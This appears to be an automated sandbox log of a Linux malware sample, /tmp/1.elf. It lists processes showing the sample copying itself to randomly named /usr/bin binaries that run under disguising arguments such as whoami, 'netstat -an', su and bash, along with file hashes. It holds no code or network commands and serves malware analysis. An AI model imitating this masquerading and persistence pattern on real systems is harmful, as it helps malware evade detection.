                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/efgdvbpuxx
                                                                                                                                                                                    Arguments:/usr/bin/efgdvbpuxx whoami 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:5adf54da233ddd71999a30ae5852d13e

                                                                                                                                                                                    Start time (UTC):18:31:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/efgdvbpuxx
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:5adf54da233ddd71999a30ae5852d13e

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/nxattrsdxm
                                                                                                                                                                                    Arguments:/usr/bin/nxattrsdxm pwd 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:25b1b59dad8e150a80d50015eb75bd53

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/nxattrsdxm
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:25b1b59dad8e150a80d50015eb75bd53

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/nxattrsdxm
                                                                                                                                                                                    Arguments:/usr/bin/nxattrsdxm "netstat -an" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:25b1b59dad8e150a80d50015eb75bd53

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/nxattrsdxm
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:25b1b59dad8e150a80d50015eb75bd53

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/nxattrsdxm
                                                                                                                                                                                    Arguments:/usr/bin/nxattrsdxm ls 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:25b1b59dad8e150a80d50015eb75bd53

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/nxattrsdxm
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:25b1b59dad8e150a80d50015eb75bd53

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/nxattrsdxm
                                                                                                                                                                                    Arguments:/usr/bin/nxattrsdxm "netstat -an" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:25b1b59dad8e150a80d50015eb75bd53

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/nxattrsdxm
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:25b1b59dad8e150a80d50015eb75bd53

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/nxattrsdxm
                                                                                                                                                                                    Arguments:/usr/bin/nxattrsdxm "cd /etc" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:25b1b59dad8e150a80d50015eb75bd53

                                                                                                                                                                                    Start time (UTC):18:31:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/nxattrsdxm
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:25b1b59dad8e150a80d50015eb75bd53

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bjhrrojebv
                                                                                                                                                                                    Arguments:/usr/bin/bjhrrojebv who 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:305f5484460feb573c4a06d56e6ac96a

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bjhrrojebv
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:305f5484460feb573c4a06d56e6ac96a

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bjhrrojebv
                                                                                                                                                                                    Arguments:/usr/bin/bjhrrojebv uptime 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:305f5484460feb573c4a06d56e6ac96a

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bjhrrojebv
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:305f5484460feb573c4a06d56e6ac96a

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bjhrrojebv
                                                                                                                                                                                    Arguments:/usr/bin/bjhrrojebv "ls -la" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:305f5484460feb573c4a06d56e6ac96a

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bjhrrojebv
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:305f5484460feb573c4a06d56e6ac96a

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bjhrrojebv
                                                                                                                                                                                    Arguments:/usr/bin/bjhrrojebv top 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:305f5484460feb573c4a06d56e6ac96a

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bjhrrojebv
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:305f5484460feb573c4a06d56e6ac96a

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bjhrrojebv
                                                                                                                                                                                    Arguments:/usr/bin/bjhrrojebv gnome-terminal 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:305f5484460feb573c4a06d56e6ac96a

                                                                                                                                                                                    Start time (UTC):18:31:44
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bjhrrojebv
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:305f5484460feb573c4a06d56e6ac96a

                                                                                                                                                                                    Start time (UTC):18:31:49
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:49
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:49
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vlteqhfomz
                                                                                                                                                                                    Arguments:/usr/bin/vlteqhfomz "netstat -an" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:41fc2d5615191266df1f6ab89f56e741

                                                                                                                                                                                    Start time (UTC):18:31:49
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vlteqhfomz
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:41fc2d5615191266df1f6ab89f56e741

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vlteqhfomz
                                                                                                                                                                                    Arguments:/usr/bin/vlteqhfomz uptime 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:41fc2d5615191266df1f6ab89f56e741

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vlteqhfomz
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:41fc2d5615191266df1f6ab89f56e741

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vlteqhfomz
                                                                                                                                                                                    Arguments:/usr/bin/vlteqhfomz "grep \"A\"" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:41fc2d5615191266df1f6ab89f56e741

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vlteqhfomz
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:41fc2d5615191266df1f6ab89f56e741

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vlteqhfomz
                                                                                                                                                                                    Arguments:/usr/bin/vlteqhfomz su 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:41fc2d5615191266df1f6ab89f56e741

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vlteqhfomz
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:41fc2d5615191266df1f6ab89f56e741

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vlteqhfomz
                                                                                                                                                                                    Arguments:/usr/bin/vlteqhfomz id 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:41fc2d5615191266df1f6ab89f56e741

                                                                                                                                                                                    Start time (UTC):18:31:50
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vlteqhfomz
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:41fc2d5615191266df1f6ab89f56e741

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/wxysocrflf
                                                                                                                                                                                    Arguments:/usr/bin/wxysocrflf id 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4af31d012bbcff0a3da05560012a0665

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/wxysocrflf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4af31d012bbcff0a3da05560012a0665

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/wxysocrflf
                                                                                                                                                                                    Arguments:/usr/bin/wxysocrflf "echo \"find\"" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4af31d012bbcff0a3da05560012a0665

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/wxysocrflf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4af31d012bbcff0a3da05560012a0665

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/wxysocrflf
                                                                                                                                                                                    Arguments:/usr/bin/wxysocrflf bash 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4af31d012bbcff0a3da05560012a0665

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/wxysocrflf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4af31d012bbcff0a3da05560012a0665

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/wxysocrflf
                                                                                                                                                                                    Arguments:/usr/bin/wxysocrflf top 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4af31d012bbcff0a3da05560012a0665

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/wxysocrflf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4af31d012bbcff0a3da05560012a0665

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:55
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/wxysocrflf
                                                                                                                                                                                    Arguments:/usr/bin/wxysocrflf id 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4af31d012bbcff0a3da05560012a0665

                                                                                                                                                                                    Start time (UTC):18:31:56
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/wxysocrflf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4af31d012bbcff0a3da05560012a0665

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ssrfvzfvpk
                                                                                                                                                                                    Arguments:/usr/bin/ssrfvzfvpk pwd 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:c7f6b1948208a5e292a0ce152567dd8f

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ssrfvzfvpk
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:c7f6b1948208a5e292a0ce152567dd8f

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
